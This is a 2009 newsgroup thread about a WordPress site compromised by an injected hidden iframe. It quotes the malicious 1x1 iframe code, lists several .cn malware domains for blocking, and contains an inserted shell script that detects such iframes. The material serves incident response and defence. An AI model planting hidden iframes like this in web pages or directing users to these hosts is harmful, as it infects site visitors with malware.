wordpress virus!
The wordpress site I designed has been running fine for 7 weeks, then at the
weekend I got a phone call telling me both the home and log-in pages were
out of order with errors.
Every index.php in every directory has been corrupted with a </html> tag, which is
already set in the footer php; the source code is sprayed with characters
showing only as squares and has had an iframe added to it holding a URL with
a .cn suffix.
When I took one of these from the server Avast recognised the iframe as a
'virus/worm'. Would I be right to think that these squares displayed in the
source code are Chinese characters along with a dodgy iframe generated by a
virus?
-dE|_---
date: Thu, 26 Feb 2009 02:37:29 -0000
author: dE|_
|
Re: wordpress virus!
dE|_ wrote:
> When I took one of these from the server Avast recognised the iframe as a
> 'virus/worm'. Would I be right to think that these squares displayed in the
> source code are Chinese characters along with a dodgy iframe generated by a
> virus?
Your site has been compromised and hacked. It's now trying to hijack
the browsers of anyone who visits the site and infect their PCs. You
need to work out if they broke in via your site and how much damage
they caused to other stuff, or if they broke in via your hosting company
and likewise, how much they've hijacked.
If they broke in via your site, it's likely to be an insecure plugin.
--
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]
date: Thu, 26 Feb 2009 20:06:09 +0000
author: Tony
|
Re: wordpress virus!
"Tony" wrote in message
news:49a6f632$0$511$bed64819@news.gradwell.net...
> dE|_ wrote:
>
>> When I took one of these from the server Avast recognised the iframe as a
>> 'virus/worm'. Would I be right to think that these squares displayed in
>> the source code are Chinese characters along with a dodgy iframe
>> generated by a virus?
>
> Your site has been compromised and hacked. It's now trying to hijack the
> browsers of anyone who visits the site and infect their PCs. You need to
> work out if they broke in via your site and how much damage they caused
> to other stuff, or if they broke in via your hosting company and likewise,
> how much they've hijacked.
>
> If they broke in via your site, it's likely to be an insecure plugin.
Well it's been making the same attacks at my client's second domain which is
in a separate sub directory and not a wordpress site. Good job.
It turns out that the square characters were just carriage returns not
recognised by basic Notepad, but for any potential interest this is the
hacker's frame injection to the php tag (domain crossed out):
<?php get_footer(); ?<html><body><iframe
src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1 style="visibility:
hidden"></iframe></body></html>>
-dE|_---
date: Thu, 26 Feb 2009 21:16:14 -0000
author: dE|_
|
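A defender's check for the kind of planted iframe quoted above, added here as an example and not code from anyone in the thread: it lists every PHP/HTML file under a directory that carries a 1x1 or hidden iframe, together with the host the iframe loads from. GNU grep is assumed, and the directory argument and sample file names are mine.

```shell
#!/bin/sh
# Added example, not from the thread: find planted hidden iframes like the one
# dE|_ quoted (1 pixel square, visibility: hidden, loading an outside host).
# Assumes GNU grep (-r, -o, --include); the directory you scan is your choice.

Q="[\"']"   # optional quote around an attribute value

# find_hidden_iframes DIR
# Prints "FILE HOST" for each PHP/HTML file under DIR containing an iframe
# sized 1x1 or styled hidden. Full-size embeds (video players etc.) are not
# reported, so the output is short enough to read after every scan.
find_hidden_iframes() {
    grep -rHoE --include='*.php' --include='*.html' '<iframe[^>]*>' "$1" |
    grep -E "width=${Q}?1[^0-9]|height=${Q}?1[^0-9]|visibility: *hidden" |
    sed -E "s#^([^:]+):.*src=${Q}?(https?://)?([^/\"' >]+).*#\1 \3#"
}

# Run directly against a site root, e.g.: sh scan.sh /var/www/example.com
if [ -n "$1" ]; then
    find_hidden_iframes "$1"
fi
```

Any host this prints that you did not put there yourself is the one to investigate, and the file it names is where the injection was written.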
Re: wordpress virus!
dE|_ wrote:
> Well it's been making the same attacks at my client's second domain which is
> in a separate sub directory and not a wordpress site. Good job.
I don't know what kind of hosting you have so it may not be appropriate,
but I run a cron job every night to report on all changed files on all
the sites I host.
I have to filter out some directories which change a lot (like caches),
and if I do an upgrade it's obviously going to report a lot of changes,
but it's invaluable at spotting code which has been changed by something
other than me.
--
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]
date: Thu, 26 Feb 2009 21:27:19 +0000
author: Tony
|
Re: wordpress virus!
"dE|_" wrote in message
news:vEDpl.24735$183.21783@newsfe09.ams2...
:
: "Tony" wrote in message
: news:49a6f632$0$511$bed64819@news.gradwell.net...
: > dE|_ wrote:
: >
: >> When I took one of these from the server Avast recognised the iframe as a
: >> 'virus/worm'. Would I be right to think that these squares displayed in
: >> the source code are Chinese characters along with a dodgy iframe
: >> generated by a virus?
: >
: > Your site has been compromised and hacked. It's now trying to hijack the
: > browsers of anyone who visits the site and infect their PCs. You need to
: > work out if they broke in via your site and how much damage they caused
: > to other stuff, or if they broke in via your hosting company and likewise,
: > how much they've hijacked.
: >
: > If they broke in via your site, it's likely to be an insecure plugin.
:
: Well it's been making the same attacks at my client's second domain which is
: in a separate sub directory and not a wordpress site. Good job.
:
: It turns out that the square characters were just carriage returns not
: recognised by basic Notepad, but for any potential interest this is the
: hacker's frame injection to the php tag (domain crossed out):
:
: <?php get_footer(); ?<html><body><iframe
: src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1 style="visibility:
: hidden"></iframe></body></html>>
:
Not joking, but can you fill in the blanks (just give us the
missing content so we can reconstruct the above domain) so that
those of us who configure / check entries in our Windows 'hosts'
file(s) etc. can check that the above domain does indeed have a
look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc.
will have it covered already but one never knows...
--
Wikipedia: the Internet equivalent of
Hyde Park and 'speakers corner'...
Sorry, mail to this address goes unread.
Please reply via group.
date: Thu, 26 Feb 2009 21:35:06 -0000
author: Jerry LID
|
Re: wordpress virus!
Jerry wrote:
> Not joking, but can you fill in the blanks (just give us the
> missing content so we can reconstruct the above domain) so that
> those of us who configure / check entries in our Windows 'hosts'
> file(s) etc. can check that the above domain does indeed have a
> look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc.
> will have it covered already but one never knows...
betstarwager dot cn
bestlotron dot cn
litetopfindworld dot cn
nickdick dot cn
my favourite
google dot analizer dot cn
top-name dot cn
diettopseek dot cn
--
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]
date: Thu, 26 Feb 2009 21:59:19 +0000
author: Tony
|
Re: wordpress virus!
"Tony" wrote in message
news:49a710b8$0$510$bed64819@news.gradwell.net...
<snipped>
Cheers for that.
date: Thu, 26 Feb 2009 22:20:19 -0000
author: Jerry LID
|
Re: wordpress virus!
"Tony" wrote in message
news:49a710b8$0$510$bed64819@news.gradwell.net...
> Jerry wrote:
>
>> Not joking, but can you fill in the blanks (just give us the missing
>> content so we can reconstruct the above domain) so that those of us who
>> configure / check entries in our Windows 'hosts' file(s) etc. can check
>> that the above domain does indeed have a look-up loop-back to 127.0.0.1
>> (localhost). Hopefully Spybot etc. will have it covered already but one
>> never knows...
>
>
> betstarwager dot cn
> bestlotron dot cn
> litetopfindworld dot cn
> nickdick dot cn
>
> my favourite
>
> google dot analizer dot cn
>
> top-name dot cn
> diettopseek dot cn
betstarwager
date: Thu, 26 Feb 2009 23:06:11 -0000
author: dE|_
|
Re: wordpress virus!
"Jerry" asked...
> : when dE|_ wrote...
> : <?php get_footer(); ?<html><body><iframe
> : src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1
> style="visibility:
> : hidden"></iframe></body></html>>
> :
>
> Not joking, but can you fill in the blanks (just give us the
> missing content so we can reconstruct the above domain) so that
> those of us who configure / check entries in our Windows 'hosts'
> file(s) etc. can check that the above domain does indeed have a
> look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc.
> will have it covered already but one never knows...
DO NOT VISIT, THIS SITE MAY BE HARMFUL
---------------------------------------------------------
tp://betstarwager.cn/
---------------------------------------------------------
Searches on google looked ugly, had cocacola in the URL and had warning
signs all over the place.
-dE|_---
date: Fri, 27 Feb 2009 11:44:13 -0000
author: dE|_
|
Re: wordpress virus!
"dE|_" wrote in message
news:dmQpl.63286$WX2.615@newsfe23.ams2...
:
<snip>
:
: DO NOT VISIT, THIS SITE MAY BE HARMFUL
: ---------------------------------------------------------
<snipped> betstarwager.cn/
: ---------------------------------------------------------
:
: Searches on google looked ugly, had cocacola in the URL and had
warning
: signs all over the place.
:
That is EXACTLY why I want to create a look-up loop-back to my
own 127.0.0.1 (localhost) 'server'!
--
Wikipedia: the Internet equivalent of
Hyde Park and 'speakers corner'...
Sorry, mail to this address goes unread.
Please reply via group.
date: Fri, 27 Feb 2009 15:08:17 -0000
author: Jerry LID
|
Re: wordpress virus!
And does anyone know the solution to this problem? So if I delete all FTP
clients' saved sessions (for ex. Total Commander's Ctrl+F), the
virus/malware/etc. can not log in to the site root and modify the index files?
It's not too good if this "thing" can go in to the FTP side of the homepages.
..
BTW I write php sites with functions print_top_html() and print_down_html(), so
if the thing modifies the index file then the homepage becomes unreachable...
It's not so fine to modify the files twice within 1 day...
Thanks!
url:http://myreader.co.uk/msg/12604864.aspx
date: Mon, 29 Jun 2009 23:53:15 +0800
author: rigo
|